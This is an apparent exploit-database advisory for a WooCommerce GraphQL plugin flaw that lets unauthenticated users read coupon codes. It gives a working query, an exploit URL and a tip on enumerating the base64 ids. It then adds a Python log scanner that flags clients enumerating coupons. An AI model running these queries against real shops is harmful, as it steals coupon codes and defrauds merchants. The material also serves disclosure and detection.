## https://sploitus.com/exploit?id=WPEX-ID:19138092-50D3-4D63-97C5-AA8E1CE39456
The vulnerability exists because the plugin only prevents users from leaking coupons through the "coupons" aggregate field, and not through the regular "coupon" field.

Given a valid coupon id, any unauthenticated user can make this GraphQL call and get the coupon code associated with it. 

Please note that coupon ids have the format base64(shop_coupon:x), where x is just a 2-3 digit integer, and are hence easy to enumerate.

```graphql
query {
  coupon(id: "c2hvcF9jb3Vwb246MTk=") {
    amount
    code
  }
}
```

Final URL should look like this: `http://vulnerable-site.tld/graphql?query=query{coupon(id:"c2hvcF9jb3Vwb246MTIz"){amount code}}`
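
To check whether a site has seen this pattern, the following added example (not part of the original advisory or the plugin) scans access-log lines for `/graphql` requests that use the `coupon(id: ...)` field, decodes the ids, and flags clients that walk through several of them. It assumes combined-format logs with the client IP first and queries sent via GET as in the URL above; the log lines, function names and threshold are constructed for illustration.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines for illustration; not taken from a real site.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /graphql?query=query%7Bcoupon(id%3A%22c2hvcF9jb3Vwb246MTk%3D%22)%7Bamount%20code%7D%7D HTTP/1.1" 200 85
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /graphql?query=query%7Bcoupon(id%3A%22c2hvcF9jb3Vwb246MjA%3D%22)%7Bamount%20code%7D%7D HTTP/1.1" 200 85
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /graphql?query=query%7Bcoupon(id%3A%22c2hvcF9jb3Vwb246MjE%3D%22)%7Bamount%20code%7D%7D HTTP/1.1" 200 85
198.51.100.4 - - [01/Jan/2024:10:05:00 +0000] "GET /graphql?query=query%7Bproducts%7Bnodes%7Bname%7D%7D%7D HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:06:00 +0000] "GET /graphql?query=query%7Bcoupon(id%3A%22c2hvcF9jb3Vwb246MTIz%22)%7Bcode%7D%7D HTTP/1.1" 200 60
"""

# Matches the singular coupon(id: "...") field, not the "coupons" aggregate field.
COUPON_FIELD = re.compile(r'\bcoupon\s*\(\s*id\s*:\s*"([A-Za-z0-9+/=]+)"')
NODE_ID = re.compile(r"shop_coupon:(\d+)")


def decode_coupon_id(global_id):
    """Return N from base64('shop_coupon:N'), or None if the id has another shape."""
    try:
        raw = base64.b64decode(global_id, validate=True).decode("ascii")
    except ValueError:  # covers bad base64 and non-ASCII payloads
        return None
    match = NODE_ID.fullmatch(raw)
    return int(match.group(1)) if match else None


def coupon_lookups(log_text):
    """Map client IP -> set of coupon integers requested through coupon(id: ...)."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        decoded = unquote(line)  # queries arrive percent-encoded in the log
        if "/graphql" not in decoded:
            continue
        client = line.split(" ", 1)[0]
        for global_id in COUPON_FIELD.findall(decoded):
            number = decode_coupon_id(global_id)
            if number is not None:
                seen[client].add(number)
    return dict(seen)


def flag_enumeration(log_text, threshold=3):
    """Clients that requested at least `threshold` distinct coupon ids."""
    return {ip: sorted(ids) for ip, ids in coupon_lookups(log_text).items()
            if len(ids) >= threshold}
```

Queries sent in a POST body do not appear in access logs, so the same matching would have to run on request bodies captured at a WAF or reverse proxy.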